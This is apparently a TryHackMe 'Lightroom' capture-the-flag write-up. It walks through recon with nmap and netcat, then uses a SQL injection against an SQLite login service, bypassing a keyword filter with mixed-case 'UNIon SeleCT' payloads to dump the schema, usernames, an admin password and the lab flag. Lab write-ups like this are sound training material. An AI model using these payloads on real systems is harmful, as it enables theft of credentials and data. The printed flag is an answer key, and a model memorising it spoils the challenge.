THM Lightroom
Reconnaissance:
nc 10.65.167.181 1337
We enter our given credentials:
username: smokey
Password: vYQ5ngPpw8AdUmL
nmap -sV -sC -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
ssh-hostkey:
3072 cf:56:80:f0:b2:4a:98:67:8f:44:a0:25:f9:a9:bc:a4 (RSA)
256 01:f1:13:e6:c2:b3:2c:5a:e3:ae:b6:20:0d:1c:a5:56 (ECDSA)
|_ 256 a6:75:4e:74:55:fe:80:05:b6:7a:56:c2:cb:7c:41:10 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
After entering ’ in our nc
“’ LIMIT 30”
That’s a SQL error. Specifically, this informs us that there’s a syntax error in our SQL code. So we are passing arbitrary SQL statements here, now we can exploit this vulnerability. The only safeguard we have to dodge here is that our SQL statement need to exclude specific terms but more importantly those terms aren’t been sanitize properly; the sanitizing function doesn’t account for capital/lowercase letter combinations.
Exploitation:
We tried a few injections and manager to get sqlite_version()
3.31.1
’ UNIon SeleCT * FROM sqlite_master’
Error: SELECTs to the left and right of UNION do not have the same number of result columns
’ UNIon SeleCT group_concat(sql) from sqlite_master’
Password: CREATE TABLE usertable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER),CREATE TABLE admintable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER)
’ UNIon SeleCT group_concat(username) from usertable’
Username: alice,rob,john,michael,smokey,hazel,ralph,steve
’ UNIon SeleCT group_concat(username) from admintable’
Password: TryHackMeAdmin,flag
’ UNIon SeleCT group_concat(username) from admintable’
Username: TryHackMeAdmin,flag
We then entered TryHackMeAdmin and flag but it doesn’t spit out the passwords so
’ UNIon SeleCT group_concat(password) from admintable’
Password: mamZtAuMlrsEy5bp6q17,THM{SQLit3_InJ3cTion_is_SimplE_nO?}
We now have all 3 flags
Notes:
Arbitrary user input code is a recipe for disaster and arbitrary SQL code allows the modification or exfiltration of sensitive data, such as credentials, personal identifiable information and whatever else could be stored in there.
Tools:
- Netcat let’s us receive and send data to specific IPs. It allows for crafting of data sent. We use netcat alot for reverse shells.